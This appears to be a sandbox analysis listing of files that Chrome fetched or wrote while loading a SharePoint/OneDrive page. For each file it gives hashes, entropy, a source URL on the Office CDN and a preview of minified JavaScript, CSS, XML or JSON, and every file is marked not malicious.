                                                            Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[126],{2789:function(e,t,n){n.d(t,{a:function(){return f}});var a=n("tslib_538"),i=n("react-lib"),r=n(2638),o=n("fui.core_220"),s=n(131),c=n("fui.util_261"),d=n(49),l=n(132),u="backward",f=function(e){function t(t){var n=e.call(this,t)||this;return n._inputElement=i.createRef(),n._autoFillEnabled=!0,n._onCompositionStart=function(e){n.setState({isComposing:!0}),n._autoFillEnabled=!1},n._onCompositionUpdate=function(){(0,r.a)()&&n._updateValue(n._getCurrentInputValue(),!0)},n._onCompositionEnd=function(e){var t=n._getCurrentInputValue();n._tryEnableAutofill(t,n.value,!1,!0),n.setState({isComposing:!1}),n._async.setTimeout(function(){n._updateValue(n._getCurrentInputValue(),!1)},0)},n._onClick=function(){n.value&&""!==n.value&&n._autoFillEnabled&&(n._autoFillEnabled=!1)},n._onKeyDown=function(e){if(n.props.onKeyDown&&n.props.onKeyDown(e),!e.nativeEvent.isComposing)switch(e.which){case o.KMv.backspace:n._autoFill
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:ASCII text, with very long lines (7228)
                                                            Category:dropped
                                                            Size (bytes):7233
                                                            Entropy (8bit):5.356563565086645
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:E52C62D7FA9F1F7598EAB375424B4755
                                                            SHA1:E18DC606B27445D97C08B3E9B19F3E25DBA8299A
                                                            SHA-256:F642F108664CB1C32EAA6ABAAEAADDB42AEF7D84DF1F51B39060C516AAE0EC0A
                                                            SHA-512:1D90C2771209075EF53CE05AF190F41677CC5EE82851D9ECD22BC0A6DB73B60B9475E1DA9AE722A40D456DB3556E317A43AF6E1E3D0F4786ED730CECD871BAAB
                                                            Malicious:false
                                                            Reputation:unknown
                                                            Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[183],{2285:function(e,t,n){n.r(t),n.d(t,{registerServiceWorker:function(){return D},registerServiceWorkerAtRemoteListHosts:function(){return I},shouldBypassSW:function(){return x},unregisterServiceWorker:function(){return C}});var a=n("tslib_538"),i=n(10),r=n("odsp.util_517"),o=n(9712);function s(){var e;if(!r.x9.isActivated("aa190528-cd3b-4289-9bcd-bd2f50bd489d","9/19/2023","Use Nucleus API to get target hosts.")){var t=null===(e=window._spPageContextInfo)||void 0===e?void 0:e.dataSyncClient;return null==t?void 0:t.then(function(e){return null==e?void 0:e.getSyncingSharepointDomains().then(function(e){var t;return null!==(t=null==e?void 0:e.d.results)&&void 0!==t?t:[]})})}return!r.x9.isActivated("42EE11F3-BA1E-4F0A-B6C4-7382F86A68F4","05/22/2023","Temporary, hard-coded support for x-host installation on SPDf specifically.")&&location.host.endsWith("-df.com")?Promise.resolve(["microsoft.sharepoint-df.com","mi
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:ASCII text, with very long lines (64331)
                                                            Category:downloaded
                                                            Size (bytes):452449
                                                            Entropy (8bit):5.248987462774036
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:AC75433B1957E82A3D020C4A0F9D8B93
                                                            SHA1:6A39D94954DF8A2493C6CAC07C1E57B7B78FB17C
                                                            SHA-256:3000B8DFA04F0FE9B1B9E686080A5C32DC7751D39B57177AE269DC969CFA9E3F
                                                            SHA-512:2F7AAFB2C46C5A97204AE12704680B074427CDD46E5B812CC4B4B4341B084C72CB271A41D633065B59E6EB176EDE528ECCEBBFD728A0CD7953E18E08D96F69B3
                                                            Malicious:false
                                                            Reputation:unknown
                                                            URL:https://res-1.cdn.office.net/files/odsp-web-prod_2025-01-03.002/odblightspeedwebpack/1732.js
                                                            Preview:/*! For license information please see 1732.js.LICENSE.txt */."use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[1732],{4239:function(e,t,n){n.d(t,{a:function(){return s}});var a=n(4127),i=n(3494),r=n(2624),o=n(9081),s=function(){function e(){}return e._handleInteractionRequiredFailures=function(t,n,s){e._doesAadErrorCodeExist(n,i.a.UNRESOLVABLE_AAD_ERROR_CODES)||i.a.RESOLVABLE_ERROR_CODES.forEach(function(e){if(n.indexOf(e)>-1){var i=t._getNavigateUrl(t.RESPONSE_TYPE.TOKEN,s)+"&prompt=select_account";r.r.instance.raiseEvent(a.d._tokenAcquisitionEventId,new a.c(o.a,i))}})},e._isInteractionRequired=function(t,n){return!e._doesAadErrorCodeExist(t,i.a.UNRESOLVABLE_AAD_ERROR_CODES)&&i.a.RESOLVABLE_ERROR_CODES.has(n)},e._isTokenRenewalTimeout=function(e){return e===i.a.TOKEN_RENEWAL_TIMEOUT},e._isEndpointsResolutionError=function(e){return e===i.a.ENDPOINTS_RESOLUTION_ERROR},e._isSessionDoesNotExistError=function(e,t){return e.indexOf(i.a.SESSION_DOES_NOT_EXIST_ER
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:ASCII text, with very long lines (9848)
                                                            Category:dropped
                                                            Size (bytes):10969
                                                            Entropy (8bit):5.465803033338553
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:6405850F1AAF4118174D0EB612F7C3A0
                                                            SHA1:17A772BAB48E76519976EBB42CF2DB1D07929DD8
                                                            SHA-256:07B5A61B4965673A1128DB2AB1C59BEC8CE1630B44D75CF8EB9B11121BCE04B1
                                                            SHA-512:28353EFBB1B41296F8B4890B286D9B189489A19CB159319D38833EB21A4C5FF75ADEF044D93F907C7E7FCC1D5B517BD54DDA5D4A0E9CF0A9192D2C8E1B948F73
                                                            Malicious:false
                                                            Reputation:unknown
                                                            Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[20],{5182:function(e,t,n){n.d(t,{a:function(){return c}});var a=n(806),i=n(331),r=n(2081),o=n(228),s=n(4114);function c(e){if(e&&0!==e.length){for(var t=[],n=0,c=(0,s.a)(e);n<c.length;n++){var d=c[n],l=d,u=!1;(0,r.a)(l)&&(l=(0,r.b)(l),u=!0);var f=i.a[l];"number"==typeof f&&f>0?t.push(u?-f:f):"folder"===l?t.push(u?i.a["!folder"]:i.a.folder):"media"===l?t.push(u?i.a["!media"]:i.a.media):"onenote"===l?t.push(u?i.a["!onenote"]:i.a.onenote):t.push(d.toUpperCase())}return(0,a.d)({filters:t},{fileTypeIconMap:o.a})}}}.,5181:function(e,t,n){n.r(t),n.d(t,{constructGetItemContext:function(){return z},constructGetItemSetContext:function(){return j},getContentTypes:function(){return G},getFolderContentTypes:function(){return K},getItemContextPostDataContext:function(){return V},spDataSourceConfigurationFacet:function(){return s.od},spPrefetchDataConfigurationFacet:function(){return s.Pd}});var a=n("tslib_538"),i=n(22),r=n
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:ASCII text, with very long lines (7239)
                                                            Category:downloaded
                                                            Size (bytes):34512
                                                            Entropy (8bit):5.435616005591021
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:A29CA11CDEE4AD5D77B6BAC7E2BC6171
                                                            SHA1:7862D5024647352ADFCDB43FFA68F3EAC3904ED2
                                                            SHA-256:E33571CE98BBFC5185839F13059248EB5BFE25A559FF5BDA4DF90B8A6B071E35
                                                            SHA-512:836CEDEC347BF9B558F10205D40FC2C540078DCBFE19117D2FE89D819EE65604CEC8FBCEB9B158B42BA965A392463D8D5560677BCCE4BEF49A75E63CC46E295C
                                                            Malicious:false
                                                            Reputation:unknown
                                                            URL:https://res-1.cdn.office.net/files/odsp-web-prod_2025-01-03.002/odblightspeedwebpack/153.js
                                                            Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[153],{4209:function(e,t,n){n.d(t,{a:function(){return i}});var a=n("fui.util_261"),i=(0,a.VH)(function(e,t,n,i){return{root:(0,a.t3)(e.__shadowConfig__,"ms-ActivityItem",t,e.root,i&&e.isCompactRoot),pulsingBeacon:(0,a.t3)(e.__shadowConfig__,"ms-ActivityItem-pulsingBeacon",e.pulsingBeacon),personaContainer:(0,a.t3)(e.__shadowConfig__,"ms-ActivityItem-personaContainer",e.personaContainer,i&&e.isCompactPersonaContainer),activityPersona:(0,a.t3)(e.__shadowConfig__,"ms-ActivityItem-activityPersona",e.activityPersona,i&&e.isCompactPersona,!i&&n&&2===n.length&&e.doublePersona),activityTypeIcon:(0,a.t3)(e.__shadowConfig__,"ms-ActivityItem-activityTypeIcon",e.activityTypeIcon,i&&e.isCompactIcon),activityContent:(0,a.t3)(e.__shadowConfig__,"ms-ActivityItem-activityContent",e.activityContent,i&&e.isCompactContent),activityText:(0,a.t3)(e.__shadowConfig__,"ms-ActivityItem-activityText",e.activityText),commentText:(0,a.t3
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:ASCII text, with very long lines (3343)
                                                            Category:downloaded
                                                            Size (bytes):12025
                                                            Entropy (8bit):5.284685568480416
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:9E13DB6CDD82BD2C2D82CD70296B5DA7
                                                            SHA1:5753410BF1D92CB344EAAF1BEA2E586D0522595F
                                                            SHA-256:ED612A9B1DD31293EC50D49C16C02B11A26D34E004A1FACEA886062025B729F6
                                                            SHA-512:AD9AC711979B0E2F661AAAD65097C9B7250199BEBEC3DF8DD485DFB8C4CB6111D5D4180C3981B305F9088502FBF28727063E7A07F4C100C41A89C31C6461451D
                                                            Malicious:false
                                                            Reputation:unknown
                                                            URL:https://res-1.cdn.office.net/files/odsp-web-prod_2025-01-03.002/odblightspeedwebpack/0.js
                                                            Preview:/*! For license information please see 0.js.LICENSE.txt */."use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[0],{3498:function(e,t,n){n.d(t,{a:function(){return i}});var a=n("react-lib");function i(e){const t=a.useContext(e);return!!t.version&&-1!==t.version.current}}.,9109:function(e,t,n){n.d(t,{a:function(){return s}});var a=n(143),i=n("fui.core_220"),r=n(142),o=n(9101);const s=(e,t)=>((0,r.a)(e),(0,a.a)(i.AFX,{mountNode:e.mountNode,children:[e.backdrop&&e.backdropMotion&&(0,a.b)(e.backdropMotion,{children:(0,a.b)(e.backdrop,{})}),(0,a.b)(o.a,{value:t.dialogSurface,children:(0,a.b)(e.root,{})})]}))}.,9108:function(e,t,n){n.d(t,{a:function(){return y}});var a=n(506),i=n(9106),r=n(168),o=n(4521),s=n("fui.core_220"),c=n(199),d=n(162),l=n(565),u=n("react-lib"),f=n(9100);const p=(0,s.ir4)("r6pzz3z",null,[".r6pzz3z{overflow-y:hidden;overflow-y:clip;scrollbar-gutter:stable;}"]),m=(0,s.ir4)("r144vlu9",null,[".r144vlu9{overflow-y:hidden;}"]);var _=n(9105),h=n(9103)
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:ASCII text, with very long lines (20032)
                                                            Category:downloaded
                                                            Size (bytes):51098
                                                            Entropy (8bit):5.483633456486338
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:A59566F875C71514140A3B81512907F8
                                                            SHA1:86A872245060CFF3244F636934F69D162767176C
                                                            SHA-256:4112E16B381431F04298540D1448AF5A959CD051F9D35B8D02DF774C76B2EFA0
                                                            SHA-512:B65A040323FEE6CE722B3E2C6C882E235ED85883B386A5081D6635939963B844D68C138750EECEE6A0615F9DA6BDAE596376F3D589198BD121AF0265900A2283
                                                            Malicious:false
                                                            Reputation:unknown
                                                            URL:https://res-1.cdn.office.net/files/odsp-web-prod_2025-01-03.002/odblightspeedwebpack/107.js
                                                            Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[107],{9640:function(e,t,n){var a;n.d(t,{a:function(){return a}}),function(e){e[e.unknown=0]="unknown",e[e.file=1]="file",e[e.folder=2]="folder",e[e.item=3]="item",e[e.list=4]="list",e[e.web=5]="web",e[e.max=6]="max"}(a||(a={}))}.,9634:function(e,t){var n;!function(e){e[e.none=1]="none",e[e.available=2]="available",e[e.other=3]="other"}(n||(n={})),t.a=n}.,9644:function(e,t){var n;!function(e){e[e.share=0]="share",e[e.copy=1]="copy",e[e.outlook=2]="outlook",e[e.nonOutlook=3]="nonOutlook",e[e.moreApps=4]="moreApps",e[e.mobileShareToTeams=5]="mobileShareToTeams",e[e.webShareToTeams=6]="webShareToTeams",e[e.grantAccess=7]="grantAccess"}(n||(n={})),t.a=n}.,9638:function(e,t,n){n.d(t,{a:function(){return m},b:function(){return l},c:function(){return s},d:function(){return h},e:function(){return d},f:function(){return u},g:function(){return o},h:function(){return r},i:function(){return v},j:function(){return c},k:fun
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:XML 1.0 document, ASCII text, with very long lines (443), with no line terminators
                                                            Category:dropped
                                                            Size (bytes):443
                                                            Entropy (8bit):4.920679566192411
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:E0A40795A3DCFC0FF6E3060AE42B4139
                                                            SHA1:103AA9D566CE73524F15E89C792BFE2E59EB6512
                                                            SHA-256:84DFB688C8655E3A75E462F66F5A316E29F5DE5AE8D785822F8E4F9BFB6B79F5
                                                            SHA-512:C8A8BC4317E8BEA6513F0C33AD94D97E2D60BE9DAB1EA2FDE301B1007E7D866C39D9FACAC4EC2A3CFFF7CF7FC4F3E49C52B39BCE42E673F7F94D853B051667CE
                                                            Malicious:false
                                                            Reputation:unknown
                                                            Preview:<?xml version="1.0" encoding="utf-8"?><m:error xmlns:m="http://schemas.microsoft.com/ado/2007/08/dataservices/metadata"><m:code>-1, Microsoft.SharePoint.Client.ClientServiceException</m:code><m:message xml:lang="en-US">The HTTP method 'GET' cannot be used to access the resource 'RenderListDataAsStream'. The operation type of the resource is specified as 'Default'. Please use correct HTTP method to invoke the resource.</m:message></m:error>
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:ASCII text, with very long lines (7077)
                                                            Category:dropped
                                                            Size (bytes):7127
                                                            Entropy (8bit):5.420974186566076
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:2BCB38979E55883977E6402A44EE52FE
                                                            SHA1:0B20ED594C2420741440425609F2136774FB83C0
                                                            SHA-256:8161E0A2496A91D24BF4EE83012B3CD323DA786F47E798147460F193D03FB96D
                                                            SHA-512:6A2DFCD638B978FE4D090C16202246452BD32062D23D4147C6CC2145B4F87193A9B5C81C07D6D679797E56665F3698B33468BCE12F836515A400696839FD3B13
                                                            Malicious:false
                                                            Reputation:unknown
                                                            Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[58],{6609:function(e,t,n){n.d(t,{a:function(){return b}});var a=n("tslib_538"),i=n(1631),r=n(806),o=n(911),s=n(21),c=n(10),d=n(36),l=n(79),u=n("odsp.util_517"),f=n(1552),p=u.x9.isActivated("23DCF7B8-CE78-43EA-8F10-7B5CD47411D5","05/04/2023","return retriedWithGroupReplaceContext as part of listItemResponse"),m=u.x9.isActivated("3f7e1f54-43e3-4c37-a5f3-b78fb07ed315","7/12/22","read groupString from postDataContext when listContext group is empty"),_=u.x9.isActivated("57D36B88-1733-4C98-82C5-4BE3D5153BD5"),h=u.x9.isActivated("41F73C52-686A-41D2-B557-301E5EE25594"),b=function(e){function t(t,n){void 0===n&&(n={});var a=t.pageContext,i=t.normalizeErrors,r=t.noRedirect,o=n.tokenProvider;return e.call(this,{dataSourceName:"ListItemDataSource"},{pageContext:a,normalizeErrors:i,noRedirect:r,tokenProvider:o})||this}return(0,a.e2)(t,e),t.prototype.getItem=function(t,n,a,i,r,o){var c=this;t.postDataContext.isOnePage=!!t
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:ASCII text, with very long lines (43480)
                                                            Category:downloaded
                                                            Size (bytes):55948
                                                            Entropy (8bit):5.501469921162329
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:16BBE5690535015963D9D06B4999B394
                                                            SHA1:627F40E6E1BA115FE058C92D17F21B3E885441E2
                                                            SHA-256:1854E72C53B435485485F6D8763103E88FDEC7426C208CC8ACD66DE81B6AD043
                                                            SHA-512:754550DAAF33C6F216EB7524A7A9CEABC78142C00430F17808CCCC2FE3F32F795E5D421D2F64964AE25988519A4EF6ABA9547AEE8F5E0F0D326B8F105653CDB3
                                                            Malicious:false
                                                            Reputation:unknown
                                                            URL:https://res-1.cdn.office.net/files/odsp-web-prod_2025-01-03.002/odblightspeedwebpack/19.js
                                                            Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[19],{6512:function(e,t,n){function a(e){return".pbix"===e}n.d(t,{a:function(){return a}})}.,9001:function(e,t,n){var a;n.d(t,{a:function(){return a}}),function(e){e.None="None",e.FilterInViewDef="FilterInViewDef",e.MultiSortsInViewDef="MultiSortsInViewDef",e.SortFieldInViewDef="SortFieldInViewDef",e.FilterInQueryParam="FilterInQueryParam",e.SortFieldInQueryParam="SortFieldInQueryParam",e.GroupFieldInQueryParam="GroupFieldInQueryParam",e.NoPermission="NoPermission",e.Unknown="Unknown"}(a||(a={}))}.,6504:function(e,t,n){n.r(t),n.d(t,{getServerData:function(){return S},getServerDataWithPrefetch:function(){return y}});var a=n("tslib_538"),i=n(189),r=n(1551),o=n(1631),s=n(28),c=n(138),d=n(6),l=n(27),u=n(1629),f=n(80),p=n(1552),m=n(6505),_=n(100);function h(e,t){var n=e.HttpRoot||new _.default(t).authority,i=new _.default(n).path,r=(e.listUrlDir||"").slice(0,i.length)===i;return(0,a.q5)((0,a.q5)({},e),{listUrlDir:r
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:ASCII text, with very long lines (5667)
                                                            Category:dropped
                                                            Size (bytes):10683
                                                            Entropy (8bit):5.391929883905985
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:EA564496A34B0B8151669AE5C0C0D32F
                                                            SHA1:701B4EAFDC3B153A80E86CE64E1237B1A85923F1
                                                            SHA-256:638CF4841537713ECEB96EBE4B2C0B1BA96470510790C79A2C481FBAFEC2B360
                                                            SHA-512:55A8D9B7E96C3873997606906BFF2A40ED7BBFB54965524BE510E5801350A2F734170C9E45B87DEA01654CE758B766487C76DD3C8BE51896DDB17ACA2F1F8424
                                                            Malicious:false
                                                            Reputation:unknown
                                                            Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[29],{3045:function(e,t,n){n.d(t,{a:function(){return a}});var a={Schema:4}}.,3782:function(e,t,n){var a=n("tslib_538"),i=n(120),r=n(3045);function o(e){return!!e.fileHandler}function s(e){return o(e)&&!!e.promoted}function c(e){return o(e)&&!!e.builtIn}function d(e){return o(e)&&!!e.hidden}var l=/^(?:data|blob|javascript):/i,u=/^(?:data|http|https):/i;function f(e){return!l.test(e)}var p={svg:!0,png1x:!0,png1_5x:!0,png2x:!0};function m(e){var t,n;if(e)for(var a in e)if(p.hasOwnProperty(a)){var i=(n=e[a])&&u.test(n)?n:void 0;i&&(t||(t={}),t[a]=i)}return t}function _(e){return{file:e.file,folder:e.folder,allowMultiSelect:e.allowMultiSelect}}var h=function(){function e(e,t){this._dataRequestor=t.dataRequestor,this._prefetchCache=t.prefetchCache,this._localFileHandlerProvider=t.localFileHandlerProvider}return e.prototype.getFileHandlerData=function(e){return(0,a.yv)(this,void 0,void 0,function(){var t,n,l,u,p,h,b
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:Unicode text, UTF-8 text, with very long lines (13797)
                                                            Category:downloaded
                                                            Size (bytes):503349
                                                            Entropy (8bit):5.4161918671962574
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:B2DF0399EB4E7C7C31DAA56C77207FC6
                                                            SHA1:25D2D4020FFAB044B3A94A4FE72B117E92DC7E85
                                                            SHA-256:84409D116725E609674372D2C9C55D7A909E0EA842D0B39A5D3C05DF204BB484
                                                            SHA-512:19A7AEE3CB9DA4C13585D9B88F9FDC437D018E2D2AF9D2D0ED5CE7F33ED734A9D7066CBDC61764E11C319B1275631A5C423B550C1643F3DC69968232034B3A14
                                                            Malicious:false
                                                            Reputation:unknown
                                                            URL:https://res-1.cdn.office.net/files/odsp-web-prod_2025-01-03.002/spserviceworker.js
                                                            Preview:/*! For license information please see spserviceworker.js.LICENSE.txt */.(()=>{var e=[(e,t,n)=>{"use strict";n.d(t,{a:()=>p,b:()=>a,c:()=>s,d:()=>o,e:()=>m,f:()=>c,g:()=>_,h:()=>g,i:()=>i,j:()=>r,k:()=>d,l:()=>f,m:()=>l,n:()=>u,o:()=>h,p:()=>b});const a=self.location.protocol+"//"+self.location.host,i=new URL(self.location.href),r=i.searchParams.get("userId"),o={NavigationPreload:"Service-Worker-Navigation-Preload",ApplicationId:"X-Service-Worker-Application-Id",InPlaceNav:"X-Service-Worker-In-Place-Nav",NavPrefetch:"X-RequestPrefetchLink",LkgPrefetch:"X-RequestPrefetchData",FromServiceWorker:"X-From-Service-Worker",SyntheticNavigation:"X-Service-Worker-Synthetic",PrefetchAndCoalesce:"X-Service-Worker-Prefetch-And-Coalesce",Coalesced:"X-Service-Worker-Coalesced",PrefetchStart:"X-Service-Worker-Prefetch-Start"},s=60,c="/_api/sw-loopback/",d={active:!1},l={active:!1},u={active:!1},f={active:!1},p="true"===i.searchParams.get("atomic"),m="v2"===i.searchParams.get("listhandler"),_="true"===
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:ASCII text, with very long lines (986)
                                                            Category:dropped
                                                            Size (bytes):1233
                                                            Entropy (8bit):5.304461180333282
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:C319A865C373C1BB5819C0FD484589FB
                                                            SHA1:20ACACD8A6B60E5F21CF8099020D1352AA0FF6B9
                                                            SHA-256:153CD93ABB6523F8E5C6576BD25E67F196E1380600B72A47AA9E10008D71B112
                                                            SHA-512:F8F2BC55C53F900E834C03F0569FDBDC5E02AB76C0CD97E983BE225B344636C2814A00C6F2ED5D8879C0D2AFF35B01533937B1D12B725B22F56E040413277016
                                                            Malicious:false
                                                            Reputation:unknown
                                                            Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[2019],{7380:function(e,t,n){n.d(t,{a:function(){return i}});var a=n("odsp.util_517");function i(){return a.x9.isActivated("7068C39D-4DC8-4C64-933D-7FE40ACEC662")}}.,5863:function(e,t,n){n.r(t),n.d(t,{refreshCopilotAgentBillingStatus:function(){return o}});var a=n("tslib_538"),i=n(7380),r=n(4589);function o(e){var t=this,o=e.pageContext,s=e.getCopilotAgentBillingDataSource,c=e.getVroomDataRequestorParams;if(o.aadUserId){var d=void 0;if(s)d=s();else{var l=c?n.e(2308).then(n.bind(n,4904)).then(function(e){return e.getVroomDataRequestor(c)}):void 0;l&&(d=n.e(1343).then(n.bind(n,7381)).then(function(e){return(0,a.yv)(t,void 0,void 0,function(){var t,n,i,r;return(0,a.SO)(this,function(a){switch(a.label){case 0:return n=(t=e.CopilotAgentBillingDataSource).bind,i=[void 0,{}],r={pageContext:o},[4,l];case 1:return[2,new(n.apply(t,i.concat([(r.vroomDataRequestor=a.sent(),r)])))]}})})}))}d&&d.then(function(e){return e.ge
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:ASCII text
                                                            Category:downloaded
                                                            Size (bytes):14730
                                                            Entropy (8bit):4.846925666070396
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:FE46325BF6167047462E10177C5D208F
                                                            SHA1:B54445BCCC3F97503835D374A8BEEDE48759723D
                                                            SHA-256:E46A8F98BDF831BBDCA0057CD9F046E6454C85478BDE2202A8FAEE6BDBF7B683
                                                            SHA-512:48ABC256D7AFE259A19624518F7C18DEF32759886CCC94FA41D02DEBD2729171ECA2B2621A4DE0B58351D19FDAD33C6D2CA2FB91EB03A1710478143AC76D3F15
                                                            Malicious:false
                                                            Reputation:unknown
                                                            URL:https://res-1.cdn.office.net/files/fabric-cdn-prod_20240610.001/onedrive-assets/onedrive-font-face-definitions.css
                                                            Preview:./* Leelawadee UI (Thai and Lao) does not have a 'light' weight, so we the 'semilight' weight instead. */.@font-face {. font-family: 'Leelawadee UI Web';. src: url('https://static2.sharepointonline.com/files/fabric/assets/fonts/leelawadeeui-thai/leelawadeeui-semilight.woff2') format('woff2'), url('https://static2.sharepointonline.com/files/fabric/assets/fonts/leelawadeeui-thai/leelawadeeui-semilight.woff') format('woff');. font-weight: 100;. font-style: normal;.}..@font-face {. font-family: 'Leelawadee UI Web';. src: url('https://static2.sharepointonline.com/files/fabric/assets/fonts/leelawadeeui-thai/leelawadeeui-semilight.woff2') format('woff2'), url('https://static2.sharepointonline.com/files/fabric/assets/fonts/leelawadeeui-thai/leelawadeeui-semilight.woff') format('woff');. font-weight: 300;. font-style: normal;.}..@font-face {. font-family: 'Leelawadee UI Web';. src: url('https://static2.sharepointonline.com/files/fabric/assets/fonts/leelawadeeui-thai/leelawadeeui-regul
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:JSON data
                                                            Category:downloaded
                                                            Size (bytes):222
                                                            Entropy (8bit):5.371348200751956
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:92EA0FA1B87134E07BE6B33067269BB4
                                                            SHA1:3A76BEEBB8DAF0F76D6C48A2A46E12FF070AB176
                                                            SHA-256:2311363DB069B1BDDB3E9A178E84846AEAD1468FC6DB056977DAB348C5C27B5A
                                                            SHA-512:6A0D84E137DC8892E3251491897C067395258BB1716C8BDDA184B2D2B9E042AE231D5BA050EA0D363DA907E6187EF283F06E60446472DE42C072F770908844A6
                                                            Malicious:false
                                                            Reputation:unknown
                                                            URL:https://ecs.office.com/config/v1/OneShell/1.0.0.0?agents=OneShell&IsConsumer=false&WorkloadId=Sharepoint&TenantId=79322344-7bca-405b-a9f9-a37cd3943751&UserId=&UPN=
                                                            Preview:{"OneShell":{"default":true},"Headers":{"ETag":"\"JHY6QFQ1fzyoMdE9X52gRZr8ZvunziTT24ISliYPVXc=\"","Expires":"Mon, 13 Jan 2025 20:48:40 GMT","CountryCode":"US","StatusCode":"200"},"ConfigIDs":{"OneShell":"P-D-1117449-1-4"}}
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:ASCII text, with very long lines (21655)
                                                            Category:dropped
                                                            Size (bytes):66350
                                                            Entropy (8bit):5.286683019760012
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:9AD0D3C43762E0C1D0EC9A7412E844E0
                                                            SHA1:23480D73C5C530BB209D0DC6BB4D28C8E9033252
                                                            SHA-256:AC04944356A8454DF30F79F3B108AE40540F6E942E6E7FDCE7144431887E2F2F
                                                            SHA-512:B0EE20CF05DB941E99AFD2390B673EF1BB375B852C2455D11C9BD369D6E266156FE5F3DF9438B438FE40E582A9BA341C5DA1221A03B52C432E51685EEAECEF46
                                                            Malicious:false
                                                            Reputation:unknown
                                                            Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[609,1092,1764,138],{5840:function(e,t,n){n.d(t,{a:function(){return a}});var a=(0,n(203).a)("clientFormCommands")}.,3714:function(e,t,n){n.d(t,{a:function(){return s}});var a=n("odsp.util_517"),i=n(2557),r=n(9141),o=n(2808),s=(0,a.AI)("PeoplePickerDataSource",r.a,{pageContext:i.a,graphPeoplePickerHelper:o.a})}.,4889:function(e,t,n){n.r(t),n.d(t,{PeoplePickerProviderKey:function(){return o}});var a=n("odsp.util_517"),i=n(2687),r=n(3714),o=(0,a.AI)("PeoplePickerProvider",i.a,{dataSource:r.a})}.,5841:function(e,t,n){n.d(t,{a:function(){return x},b:function(){return y},c:function(){return C},d:function(){return D},e:function(){return S},f:function(){return I},g:function(){return A},h:function(){return w},i:function(){return E}});var a=n("react-lib"),i=n(217),r=n(56),o=n("tslib_538"),s=n(6697),c=n(257),d=n(82),l=n(4248),u=n("odsp.util_517"),f=n(9637),p=n(10517);(0,n("fui.util_261").ZW)([{rawString:".od-ShareNotifi
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:ASCII text, with very long lines (65461)
                                                            Category:downloaded
                                                            Size (bytes):180613
                                                            Entropy (8bit):5.467268164066209
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:B2651918029802224588A416828F78BA
                                                            SHA1:18B167F3909F42E2CBDB811CB48B709E43CC94F3
                                                            SHA-256:A805DDA84477C1AB0C97C0185E2F3A075787038A04AF6EE51177B06582B27520
                                                            SHA-512:72B12FF52EC4779B47765A88B6717165A3855FB9C3495C5550A0D6081BFB55771BE5D4F6CB6DBBCD58D715A6FBFD948EFCA0BD5FF81471621CC979CB4D55A1A4
                                                            Malicious:false
                                                            Reputation:unknown
                                                            URL:https://res-1.cdn.office.net/files/sp-client/odsp.fluentui.core/fui.core-3c2ad75e.js
